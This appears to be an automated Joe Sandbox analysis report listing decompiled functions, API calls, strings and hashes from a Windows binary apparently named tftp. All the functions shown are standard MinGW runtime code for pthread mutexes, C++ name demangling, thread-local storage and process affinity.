Opcode ID: de4fc774c3839e5a52e1e8a93e05da4c5ffa61fffa46ff9fac106151d4cf8f0a
Instruction ID: 77c7e972383a6b015b8fdd9786dcab0b6c490567834d57d565eddf3f1c44ac6a
Opcode Fuzzy Hash: de4fc774c3839e5a52e1e8a93e05da4c5ffa61fffa46ff9fac106151d4cf8f0a
Instruction Fuzzy Hash: D7E0B6B1508741EAD710BF65C54A3AEBAE0AF80348F41891DE4883B1C2C7FC50899BAB

Uniqueness

Uniqueness Score: -1.00%

Function 004012E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,004137FB), ref: 004012F6
GetProcAddress.KERNEL32 ref: 00401312

Strings

_Jv_RegisterClasses, xrefs: 00401307
libgcj-13.dll, xrefs: 004012EF

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _Jv_RegisterClasses$libgcj-13.dll
API String ID: 1646373207-3682238868
Opcode ID: 5ab751bdde4f1983170b33baa2028151b15d48ea060ae36d750e8739a1cf2d38
Instruction ID: e34bc7d62238a91dafce134e4916589ba72007d5a5b7e08ccc4dd3fd645653ab
Opcode Fuzzy Hash: 5ab751bdde4f1983170b33baa2028151b15d48ea060ae36d750e8739a1cf2d38
Instruction Fuzzy Hash: 63E048B170420586D7003BB9950535F7AE45BC0348F49C43EDC80A7695EB7CC944879A

Uniqueness

Uniqueness Score: -1.00%

Function 004012E9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,004137FB), ref: 004012F6
GetProcAddress.KERNEL32 ref: 00401312

Strings

_Jv_RegisterClasses, xrefs: 00401307
libgcj-13.dll, xrefs: 004012EF

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _Jv_RegisterClasses$libgcj-13.dll
API String ID: 1646373207-3682238868
Opcode ID: fbc1b640f7ea9ae67b7c8026e127cf64f1ff50c1d053ea5e0fe348cebdcf7ef4
Instruction ID: 68a34b5e68b43951ccb3d2dba64f45263a909d0be07579b74ff3feb8b26152a9
Opcode Fuzzy Hash: fbc1b640f7ea9ae67b7c8026e127cf64f1ff50c1d053ea5e0fe348cebdcf7ef4
Instruction Fuzzy Hash: CFE012B5A0470586D7003BBA950636F7EE95BC1348F89C43EDCC067699EB7CC944879B

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2A0, Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040B335
memcpy.MSVCRT ref: 0040B350
free.MSVCRT ref: 0040B35A

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: bfce1a9c134a35b9f57a6946703ea6a23e6f6a36c7e58c479df9a1d8b15d527e
Instruction ID: 9671d27155a2d86a5a84e7823f1dfca5a24e94db2f75492ef7659a932c03747d
Opcode Fuzzy Hash: bfce1a9c134a35b9f57a6946703ea6a23e6f6a36c7e58c479df9a1d8b15d527e
Instruction Fuzzy Hash: A83128B12083068BC710AF66948072FBBE1EF95354F24093EE994AB3D4D779984587DF

Uniqueness

Uniqueness Score: -1.00%

Function 00407A97, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00407A97(signed int* __ebx) {
				signed int _t68;
				signed int _t71;
				signed int* _t74;
				unsigned int _t78;
				void* _t80;
				signed int _t83;
				signed int _t84;
				signed int* _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				signed int _t99;
				signed int _t100;
				signed int _t105;
				char* _t107;
				signed char* _t108;
				signed int* _t109;
				void* _t111;
				void* _t113;
				void* _t114;
				signed char* _t116;
				signed int** _t117;

				_t91 = __ebx;
				_t68 = __ebx[0x40];
				_t107 = "{lambda(";
				while(1) {
					_t97 =  *_t107 & 0x000000ff;
					if(_t68 != 0xff) {
						_t93 = _t68 + 1;
					} else {
						_t117[4] = _t97;
						_t91[0x3f] = 0;
						_t117[1] = 0xff;
						_t117[2] = _t91[0x43];
						 *_t117 = _t91;
						_t91[0x42]();
						_t93 = 1;
						_t68 = 0;
						_t91[0x48] = _t91[0x48] + 1;
						_t97 = _t117[4];
					}
					_t107 =  &(_t107[1]);
					_t91[0x40] = _t93;
					 *(_t91 + _t68) = _t97;
					_t91[0x41] = _t97;
					if(_t107 == 0x415c42) {
						break;
					}
					_t68 = _t93;
				}
				_t108 = ")#";
				E00409A90(_t91,  *((intOrPtr*)(_t114 + 4)), _t117[3]);
				_t71 = _t91[0x40];
				while(1) {
					_t99 =  *_t108 & 0x000000ff;
					if(_t71 != 0xff) {
						_t95 = _t71 + 1;
					} else {
						_t117[3] = _t99;
						_t91[0x3f] = 0;
						_t117[1] = 0xff;
						_t117[2] = _t91[0x43];
						 *_t117 = _t91;
						_t91[0x42]();
						_t95 = 1;
						_t71 = 0;
						_t91[0x48] = _t91[0x48] + 1;
						_t99 = _t117[3];
					}
					_t108 =  &(_t108[1]);
					_t91[0x40] = _t95;
					 *(_t91 + _t71) = _t99;
					_t91[0x41] = _t99;
					if(_t108 == 0x415c45) {
						break;
					}
					_t71 = _t95;
				}
				_t117[1] = "%ld";
				_t117[2] =  *((intOrPtr*)(_t114 + 8)) + 1;
				_t74 =  &(_t117[0xc]);
				 *_t117 = _t74;
				_t109 = _t74;
				_t117[4] = _t74;
				sprintf(??, ??);
				do {
					_t100 =  *_t109;
					_t109 =  &(_t109[1]);
					_t78 = _t100 - 0x01010101 &  !_t100 & 0x80808080;
				} while (_t78 == 0);
				_t79 =  ==  ? _t78 >> 0x10 : _t78;
				_t110 =  ==  ?  &(_t109[0]) : _t109;
				_t80 = ( ==  ? _t78 >> 0x10 : _t78) + ( ==  ? _t78 >> 0x10 : _t78);
				asm("sbb esi, 0x3");
				_t111 = ( ==  ?  &(_t109[0]) : _t109) - _t117[4];
				if(_t111 == 0) {
					_t96 = _t91[0x40];
					L23:
					if(_t96 == 0xff) {
						_t91[0x3f] = 0;
						_t117[1] = 0xff;
						 *_t117 = _t91;
						_t117[2] = _t91[0x43];
						_t91[0x42]();
						_t83 = 1;
						_t96 = 0;
						_t91[0x48] = _t91[0x48] + 1;
					} else {
						_t83 = _t96 + 1;
					}
					_t91[0x40] = _t83;
					 *((char*)(_t91 + _t96)) = 0x7d;
					_t91[0x41] = 0x7d;
					return _t83;
				}
				_t116 = _t117[4];
				_t84 = _t91[0x40];
				_t113 = _t111 + _t116;
				while(1) {
					_t105 =  *_t116 & 0x000000ff;
					if(_t84 != 0xff) {
						_t96 = _t84 + 1;
					} else {
						_t117[3] = _t105;
						_t91[0x3f] = 0;
						_t117[1] = 0xff;
						_t117[2] = _t91[0x43];
						 *_t117 = _t91;
						_t91[0x42]();
						_t96 = 1;
						_t84 = 0;
						_t91[0x48] = _t91[0x48] + 1;
						_t105 = _t117[3];
					}
					_t116 =  &(_t116[1]);
					_t91[0x40] = _t96;
					 *(_t91 + _t84) = _t105;
					_t91[0x41] = _t105;
					if(_t116 == _t113) {
						goto L23;
					}
					_t84 = _t96;
				}
				goto L23;
			}

0x00407a97
0x00407a97
0x00407a9d
0x00407ac7
0x00407acc
0x00407acf
0x00407aa4
0x00407ad1
0x00407ad7
0x00407adb
0x00407ae2
0x00407aea
0x00407aee
0x00407af1
0x00407af7
0x00407afc
0x00407afe
0x00407b05
0x00407b05
0x00407aa7
0x00407ab0
0x00407ab6
0x00407ab9
0x00407abf
0x00000000
0x00000000
0x00407ac5
0x00407ac5
0x004084f5
0x004084fe
0x00408503
0x0040852f
0x00408534
0x00408537
0x00408510
0x00408539
0x0040853f
0x00408543
0x0040854a
0x00408552
0x00408556
0x00408559
0x0040855f
0x00408564
0x00408566
0x0040856d
0x0040856d
0x00408513
0x0040851c
0x00408522
0x00408525
0x0040852b
0x00000000
0x00000000
0x0040852d
0x0040852d
0x00408576
0x00408581
0x00408585
0x00408589
0x0040858c
0x0040858e
0x00408592
0x00408597
0x00408597
0x00408599
0x004085a6
0x004085a6
0x004085b7
0x004085bd
0x004085c0
0x004085c2
0x004085c5
0x004085c9
0x00408640
0x00408646
0x0040864c
0x00408f49
0x00408f50
0x00408f58
0x00408f5b
0x00408f5f
0x00408f65
0x00408f6a
0x00408f6c
0x00408652
0x00408652
0x00408652
0x00408655
0x0040865b
0x0040865f
0x0040646f
0x0040646f
0x004085cb
0x004085cf
0x004085d5
0x004085fb
0x00408600
0x00408604
0x004085e0
0x00408606
0x0040860c
0x00408610
0x00408617
0x0040861f
0x00408623
0x00408626
0x0040862c
0x00408631
0x00408633
0x0040863a
0x0040863a
0x004085e3
0x004085e8
0x004085ee
0x004085f1
0x004085f7
0x00000000
0x00000000
0x004085f9
0x004085f9
0x00000000

Strings

%ld, xrefs: 00408576
}, xrefs: 0040865F
{lambda(, xrefs: 00407A9D

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID:
String ID: %ld${lambda($}
API String ID: 0-283914991
Opcode ID: c32be84fb74754818ef385b697b4065b78c9ba9032e4ebd404b1bd0bed86f8c0
Instruction ID: ee4bd88b98496916908a62442b566452c2d6d70a43c01f87c05c2754e4bf3918
Opcode Fuzzy Hash: c32be84fb74754818ef385b697b4065b78c9ba9032e4ebd404b1bd0bed86f8c0
Instruction Fuzzy Hash: A0510A70508241DBCB15CF28C4847EA7BE1AF95304F0889BEECC99F386D7B998849B56

Uniqueness

Uniqueness Score: -1.00%

Function 00407A1C, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

}, xrefs: 004084DF
{unnamed type#, xrefs: 00407A26
%ld, xrefs: 004083F6

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID:
String ID: %ld${unnamed type#$}
API String ID: 0-3303847590
Opcode ID: 056eed30100d5ae443a2e1a636cd9dabc21638808b7ff302a2293b08295da76f
Instruction ID: c76d8fe415d42706542491673d8a8f48e18eca4c044210df9f7e6897e015e7fb
Opcode Fuzzy Hash: 056eed30100d5ae443a2e1a636cd9dabc21638808b7ff302a2293b08295da76f
Instruction Fuzzy Hash: 59411C70508341CBCB55CF28C0C47AA7BE1AF55314F0889BEECC99F386E77998859B56

Uniqueness

Uniqueness Score: -1.00%

Function 0040E898, Relevance: 6.1, APIs: 4, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0040E898(void* __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8) {
				void* _v32;
				long _v36;
				signed int _v40;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t36;
				void* _t41;
				void* _t45;
				signed int _t46;
				int _t49;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t66;
				signed int _t69;
				signed int _t72;
				void* _t73;
				signed int _t76;
				void* _t77;
				void* _t79;
				signed int _t80;
				void* _t81;
				signed int* _t82;

				_t66 = __edx;
				_t58 = __ecx;
				_v36 = GetLastError();
				_t36 = E0040DFE0(_t56, _t66, _t73, _t79);
				_t57 = _t36;
				_t2 = _t36 + 0x34; // 0x34
				_t80 = _t2;
				 *_t82 = _t80;
				E00411108(_t58);
				if( *(_t57 + 0x28) <= _a4) {
					_t69 = _a4 + 1;
					_v40 = _t69;
					_v56 = _t69 << 2;
					 *_t82 =  *(_t57 + 0x2c);
					_t41 = realloc(??, ??);
					_t81 = _t41;
					if(_t41 == 0) {
						L6:
						 *_t82 = _t80;
						E00411070(_t69);
						return 0xc;
					} else {
						_v56 = _v40;
						 *_t82 =  *(_t57 + 0x30);
						_t45 = realloc(??, ??);
						_t69 = _t45;
						if(_t45 == 0) {
							goto L6;
						} else {
							_t46 =  *(_t57 + 0x28);
							_v32 = _t81 + _t46 * 4;
							_t49 = memset(_v32, 0, _v40 - _t46 << 2 << 0);
							_t76 =  *(_t57 + 0x28);
							_t77 = _t76 + _t69;
							_v32 = _t77;
							memset(_t77, _t49, _v40 - _t76 << 0);
							_t82 =  &(_t82[6]);
							 *(_t57 + 0x2c) = _t81;
							 *(_t57 + 0x30) = _t69;
							 *(_t57 + 0x28) = _v40;
							goto L2;
						}
					}
				} else {
					_t81 =  *(_t57 + 0x2c);
					L2:
					_t72 = _a4;
					 *((intOrPtr*)(_t81 + _t72 * 4)) = _a8;
					 *((char*)( *(_t57 + 0x30) + _t72)) = 1;
					 *_t82 = _t80;
					E00411070(_t72);
					_t54 = _v36;
					 *_t82 = _t54;
					SetLastError(??);
					_push(_t54);
					return 0;
				}
			}

0x0040e898
0x0040e898
0x0040e8a4
0x0040e8a8
0x0040e8ad
0x0040e8af
0x0040e8af
0x0040e8b2
0x0040e8b5
0x0040e8c1
0x0040e8fc
0x0040e8fd
0x0040e906
0x0040e90d
0x0040e910
0x0040e915
0x0040e919
0x0040e974
0x0040e974
0x0040e977
0x0040e988
0x0040e91b
0x0040e91f
0x0040e926
0x0040e929
0x0040e92e
0x0040e932
0x00000000
0x0040e934
0x0040e934
0x0040e944
0x0040e94e
0x0040e950
0x0040e959
0x0040e95b
0x0040e95f
0x0040e95f
0x0040e961
0x0040e964
0x0040e96b
0x00000000
0x0040e96b
0x0040e932
0x0040e8c3
0x0040e8c3
0x0040e8c6
0x0040e8ca
0x0040e8ce
0x0040e8d5
0x0040e8d9
0x0040e8dc
0x0040e8e1
0x0040e8e5
0x0040e8e8
0x0040e8ed
0x0040e8f7
0x0040e8f7

APIs

GetLastError.KERNEL32 ref: 0040E89F

Part of subcall function 0040DFE0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040EF28), ref: 0040E022

Part of subcall function 00411108: Sleep.KERNEL32(?,?,?,0040DD6D,?,?,?,0040EFB7), ref: 0041113C
Part of subcall function 00411108: Sleep.KERNEL32(?,?,?,0040DD6D,?,?,?,0040EFB7), ref: 0041116F

SetLastError.KERNEL32 ref: 0040E8E8
realloc.MSVCRT ref: 0040E910
realloc.MSVCRT ref: 0040E929

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: ErrorLastSleeprealloc$Value
String ID:
API String ID: 2367679126-0
Opcode ID: f8794e9ea6f7d03983d16c74eb01f003c4db6b527dd48a927977c94b0186908b
Instruction ID: 610040ee0b63aaa1aae1dccdd839bddee23ad763c001825c51ec28dfb77770c4
Opcode Fuzzy Hash: f8794e9ea6f7d03983d16c74eb01f003c4db6b527dd48a927977c94b0186908b
Instruction Fuzzy Hash: 2D313CB1A083018FCB04EF6AD48045EBBE1EFC9350F118A2EF98497355E635D985CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00411918, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00411940
free.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,00411A80), ref: 004119F7

Part of subcall function 004106F8: calloc.MSVCRT ref: 00410723
Part of subcall function 004106F8: CreateSemaphoreA.KERNEL32 ref: 00410779

free.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,00411A80), ref: 00411A13

Part of subcall function 004126B0: calloc.MSVCRT ref: 004126E1
Part of subcall function 004126B0: CreateSemaphoreA.KERNEL32 ref: 0041272A
Part of subcall function 004126B0: CreateSemaphoreA.KERNEL32 ref: 00412754
Part of subcall function 004126B0: InitializeCriticalSection.KERNEL32 ref: 00412770
Part of subcall function 004126B0: InitializeCriticalSection.KERNEL32(00000000), ref: 0041277C
Part of subcall function 004126B0: InitializeCriticalSection.KERNEL32(00000000,00000000), ref: 00412788

Strings

, xrefs: 00411931

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CreateCriticalInitializeSectionSemaphorecalloc$free
String ID:
API String ID: 3420411-3916222277
Opcode ID: 7d00079b6fdecb38e61d6405617c0b78e82f3348807a0f44067b30fe79620905
Instruction ID: 08195a5de05b2e0802bf1c02d4a51f756d89f8e9adff70a2de8f22b5ef95c3e0
Opcode Fuzzy Hash: 7d00079b6fdecb38e61d6405617c0b78e82f3348807a0f44067b30fe79620905
Instruction Fuzzy Hash: 742153B12183058FD700AF65D4943ABBBE4EF40358F01486EE5D48B351E77DD884DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004106F8, Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00410723
CreateSemaphoreA.KERNEL32 ref: 00410779

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CreateSemaphorecalloc
String ID:
API String ID: 194818478-0
Opcode ID: cc6611c8d40c5052352d72e5ae9e877b384991ebe125dcecaf3c0215e6a19813
Instruction ID: 6ff116f7a09c2c2ba817b1170236d9757f213349c1c073194ceaebd6c00eb231
Opcode Fuzzy Hash: cc6611c8d40c5052352d72e5ae9e877b384991ebe125dcecaf3c0215e6a19813
Instruction Fuzzy Hash: 69214F742083028BE710AF19D48079BB7E0EB44318F158A6EE8984B395D7BDECC5CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00410634, Relevance: 6.1, APIs: 4, Instructions: 67
threadCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00410634(intOrPtr* _a4) {
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				void** __ebx;
				long* __edi;
				void* __esi;
				intOrPtr* _t23;
				long _t24;
				int _t28;
				long _t29;
				intOrPtr* _t31;
				long _t32;
				long _t33;
				long _t41;
				long _t42;
				intOrPtr* _t48;
				intOrPtr* _t50;
				int _t51;
				long _t52;
				void* _t58;
				intOrPtr _t65;
				void* _t66;
				void* _t71;
				void* _t72;
				long* _t74;
				long* _t75;

				_t72 = _t71 - 0x10;
				_t48 = _a4;
				_t23 = _t48;
				L9();
				if(_t23 != 0) {
					return _t23;
				} else {
					__esi =  *__ebx;
					__edi =  *(__esi + 8);
					if( *(__esi + 8) != 0) {
						__edi =  *(__esi + 0x14);
						if(__edi == 0) {
							goto L30;
						} else {
							if(__edi == GetCurrentThreadId()) {
								if( *(__esi + 8) != 2) {
									goto L23;
								} else {
									_t22 = __esi + 0xc; // 0xc
									__eax = _t22;
									__eax = InterlockedDecrement(_t22);
									if(__eax == 0) {
										goto L23;
									} else {
										__edx = 0;
									}
								}
								goto L26;
							} else {
								__esi =  *__ebx;
								goto L30;
							}
						}
					} else {
						__ecx =  *(__esi + 0x14);
						if(__ecx == 0) {
							L30:
							__edx = 1;
							__eax = __esi;
							__esp = __esp + 0x10;
							_pop(__ebx);
							_pop(__esi);
							_pop(__edi);
							goto L1;
						} else {
							L23:
							 *(__esi + 0x14) = 0;
							__eax =  *(__esi + 0x18);
							if(__eax == 0) {
								L25:
								__edx = 0;
							} else {
								__eax = ReleaseSemaphore(__eax, 1, 0);
								__esp = __esp - 0xc;
								if(__eax == 0) {
									 *(__esi + 0x14) = GetCurrentThreadId();
									__edx = 1;
								} else {
									goto L25;
								}
							}
							L26:
							__eax =  *__ebx;
							__esp = __esp + 0x10;
							_pop(__ebx);
							_pop(__esi);
							_pop(__edi);
							L1:
							_push(_t63);
							_push(_t48);
							_t74 = _t72 - 0x24;
							_t50 = _t23;
							_t65 = _t59;
							_t24 =  *0x41db1c;
							if(_t24 == 0) {
								_t24 = E00410280();
								 *0x41db1c = _t24;
							}
							 *_t74 = _t24;
							E00411108(_t58);
							if( *_t50 != 0xbab1f00d ||  *((intOrPtr*)(_t50 + 4)) <= 0) {
								_v28 = 0x3a;
								_v32 = "c:/crossdev/src/winpthreads-svn6233/src/mutex.c";
								_v36 = "(m_->valid == LIFE_MUTEX) && (m_->busy > 0)";
								_v40 = "Assertion failed: (%s), file %s, line %d\n";
								 *_t74 = __imp___iob + 0x40;
								_t28 = fprintf(??, ??);
								 *_t74 = 1;
								exit(??);
								_push(_t65);
								_push(_t50);
								_t75 = _t74 - 0x14;
								_t51 = _t28;
								_t66 =  *_t28;
								_t29 =  *0x41db1c;
								if(_t29 == 0) {
									_t29 = E00410280();
									 *0x41db1c = _t29;
								}
								 *_t75 = _t29;
								E00411108(_t58);
								_t31 =  *_t51;
								if(_t31 == 0 ||  *_t31 != 0xbab1f00d) {
									_t52 = 0x16;
								} else {
									_t9 = _t31 + 3; // 0x3
									_t59 = _t9;
									if(_t9 <= 2 ||  *((intOrPtr*)(_t66 + 0x14)) == 0) {
										_t52 = 1;
									} else {
										_t59 =  *((intOrPtr*)(_t31 + 4)) + 1;
										 *((intOrPtr*)(_t31 + 4)) =  *((intOrPtr*)(_t31 + 4)) + 1;
										_t52 = 0;
									}
								}
								_t32 =  *0x41db1c;
								if(_t32 == 0) {
									_t33 = E00410280();
									 *0x41db1c = _t33;
									 *_t75 = _t33;
									E00411070(_t59);
									return _t52;
								} else {
									 *_t75 = _t32;
									E00411070(_t59);
									return _t52;
								}
							} else {
								 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) - 1;
								_t41 =  *0x41db1c;
								if(_t41 == 0) {
									_t42 = E00410280();
									 *0x41db1c = _t42;
									 *_t74 = _t42;
									E00411070(_t59);
									return _t65;
								} else {
									 *_t74 = _t41;
									E00411070(_t59);
									return _t65;
								}
							}
						}
					}
				}
			}

0x00410637
0x0041063a
0x0041063e
0x00410640
0x00410647
0x004106c2
0x00410649
0x00410649
0x0041064b
0x00410650
0x00410698
0x0041069d
0x00000000
0x0041069f
0x004106a6
0x004106d8
0x00000000
0x004106de
0x004106de
0x004106de
0x004106e4
0x004106ec
0x00000000
0x004106f2
0x004106f2
0x004106f2
0x004106ec
0x00000000
0x004106a8
0x004106a8
0x00000000
0x004106a8
0x004106a6
0x00410652
0x00410652
0x00410657
0x004106aa
0x004106aa
0x004106af
0x004106b1
0x004106b4
0x004106b5
0x004106b6
0x00000000
0x00410659
0x00410659
0x00410659
0x00410660
0x00410665
0x00410686
0x00410686
0x00410667
0x0041067a
0x0041067f
0x00410684
0x004106c9
0x004106cc
0x00000000
0x00000000
0x00000000
0x00410684
0x00410688
0x00410688
0x0041068a
0x0041068d
0x0041068e
0x0041068f
0x004103b0
0x004103b0
0x004103b1
0x004103b2
0x004103b5
0x004103b7
0x004103b9
0x004103c0
0x00410418
0x0041041d
0x0041041d
0x004103c2
0x004103c5
0x004103d0
0x00410424
0x0041042c
0x00410434
0x0041043c
0x0041044c
0x0041044f
0x00410454
0x0041045b
0x00410460
0x00410461
0x00410462
0x00410465
0x00410467
0x00410469
0x00410470
0x004104e8
0x004104ed
0x004104ed
0x00410472
0x00410475
0x0041047a
0x0041047e
0x00410488
0x004104a8
0x004104a8
0x004104a8
0x004104ae
0x004104c4
0x004104b7
0x004104ba
0x004104bb
0x004104be
0x004104be
0x004104ae
0x0041048d
0x00410494
0x004104cc
0x004104d1
0x004104d6
0x004104d9
0x004104e5
0x00410496
0x00410496
0x00410499
0x004104a5
0x004104a5
0x004103d9
0x004103dd
0x004103e0
0x004103e7
0x004103fc
0x00410401
0x00410406
0x00410409
0x00410415
0x004103e9
0x004103e9
0x004103ec
0x004103f8
0x004103f8
0x004103e7
0x004103d0
0x00410657
0x00410650

APIs

ReleaseSemaphore.KERNEL32(?,?,?,?,0040DB5D), ref: 0041067A
GetCurrentThreadId.KERNEL32 ref: 0041069F
GetCurrentThreadId.KERNEL32 ref: 004106C4

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CurrentThread$ReleaseSemaphore
String ID:
API String ID: 1483290962-0
Opcode ID: 1464d03a9e81ef3a7d62011bf0bf6874f560c423b8284a6f3b2b7892de724735
Instruction ID: 0f0ff2e4c7a6ad0ef231863d455620b3adc82df51d545e006db5972a9f651c4d
Opcode Fuzzy Hash: 1464d03a9e81ef3a7d62011bf0bf6874f560c423b8284a6f3b2b7892de724735
Instruction Fuzzy Hash: E111B1317047018BDB20AE29D4803A7B3A0EFD0358F14492FD89587345E6B9E8E5879A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1BC, Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0040E1CE
GetProcessAffinityMask.KERNEL32 ref: 0040E1E6
GetCurrentProcess.KERNEL32 ref: 0040E21B
SetProcessAffinityMask.KERNEL32 ref: 0040E227

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 89a44a884144bc3407dcaad2311cd0cfa058a26cdd78d750498dd268ca8e378a
Instruction ID: 25f8d6145f681a62786aecaf37a4de3dbb700b8dedc3577bfde1aa329aa0f964
Opcode Fuzzy Hash: 89a44a884144bc3407dcaad2311cd0cfa058a26cdd78d750498dd268ca8e378a
